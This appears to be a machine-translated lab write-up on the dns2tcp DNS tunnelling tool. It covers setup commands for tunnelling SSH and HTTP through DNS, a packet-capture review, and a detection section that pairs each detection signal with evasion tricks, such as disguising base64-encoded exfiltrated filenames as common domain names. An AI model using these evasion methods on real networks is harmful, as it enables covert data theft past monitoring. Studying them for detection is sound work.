Preface

This paper studies DNS A tool for tunnels ,dns2tcp

github：https://github.com/alex-sector/dns2tcp

One 、 summary

1、 brief introduction

Last updated on 2017 year ,C Language writing

TCP over DNS, That is, through DNS Tunnel forwarding TCP Connect , No encryption . Direct connection is adopted , But the speed is not particularly optimistic , Advantage lies in kali Directly integrated with this tool , part linux Distributions can also be downloaded directly through the package tool , Relatively convenient

• Use legal DNS Server implementation DNS Tunnel
• C/S（dns2tcpc / dns2tcpd） structure
• Default by TXT Record encryption （base64） To transmit data （A Limited record length ）
• Keep the connection after the tunnel is built , Probably 0.6s Send a packet , The biggest is 3s You can set
• Need to cooperate with other agent tools

2、 principle

DNS See the principle in ： One article makes it clear DNS Domain name resolution

This tool is to put data in TXT In the record base64 Transmit after encryption ,DNS The packet passes through the authority DNS Provided by the server NS Record and A Record to the server DNS The server , Complete the traffic agent

3、 usage

Common commands ：

-c    Large flow compression 
-F    The front desk operation 
-f    Specify profile 
-r    Specify the resources to use 
-z    Appoint DNS domain name 
-k    Set the transmission password 
-l    Listen on local port 
-d    Compilation level (1 | 2 |3 )   

（1） Server side

modify /etc/dns2tcpd.conf The configuration file
Build a tunnel dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

（2） client

Test whether it can be connected ：dns2tcpc -z xxx.xx.xxx
Build a tunnel to use ssh service ：dns2tcpc -c -k password -d 1 -l 7002 -r ssh -z xxx.xx.xxx
Then throw the corresponding service into the locally set port

Two 、 practice

1、 Test scenarios

（1） attack

Kali2021 192.168.10.128

（2）DNS The server

windows server 2008 ：192.168.10.200

Set static IP, See https://blog.csdn.net/pockeyfan/article/details/42063683

newly build A Record , Point to the server kali

Create a new delegate （ namely NS Record ） Point to the just set A Recorded domain name

Build another one A The record points to windows server own

（3） Target machine

Ubuntu 18.04 192.168.10.129

Because the simulation is DNS The server is the real authoritative server , That is, the target should be able to DNS Resolved to DNS The server , So we should take the target plane's DNS Analytical change

nslookup Check out

2、 Build a tunnel

（1） Server side

start-up apache service

Modify the configuration file

After modification

Start listening

（2） client

Test whether it can be connected

start-up

Then you can visit http service

Similar ones ssh、nc、smtp And other agency methods can be represented through the tunnel
notes ：ssh Occasionally prompt reset peer, Maybe try a few more times

3、 Grab the bag and have a look

handshake phase

Heartbeat bag , All serious domain names

When using the tunnel , A lot of TXT Record pack , Content base64 After encryption, put it in the domain name

3、 ... and 、 Explore

1、 Source code and Analysis

TODO

2、 Detection and bypass

（1） abnormal DNS Number of packets

As shown in the figure above , Using DNS Tunnel time ,1s There will be close 200 individual DNS package , And they all come from the same DNS The server

Bypass method ： Add interval in the middle , But this will lead to very slow speed

（2） Special record type TXT

Usually only mail servers / The gateway will send TXT Record , And there won't be so many , natural DNS In network traffic ,TXT The proportion of records may be only 1%-2%

The way around ： A mixture of A、AAAA、TXT、MX、CNAME Etc

（3） Abnormal domain name

There are similar in the domain name base64 String , It can be detected by information entropy and other methods

The way around ： Maintain a common domain name dictionary , And then split , But this will greatly increase the number of packets

 For example, now we need to put a file name  finalexamanswer.doc  Spread it out 
base64  once  -> ZmluYWxleGFtYW5zd2VyLmRvYw
 Then code the common domain name , become  Zm -> zone.music.domain,lu -> login.user.domain,YW``yun.web.domain …

（4） Heartbeat bag

The interval and number of heartbeat packets are problems

Bypass method ： The interval can be lengthened , Even random , The quantity can be changed UDP socket Rebuild the tunnel

（5） Command characteristics

Some characteristic strings of the command

Bypass method ： Change the string

Conclusion

Heartbeat packet is a request for normal domain name, which is very good , But there is still room for improvement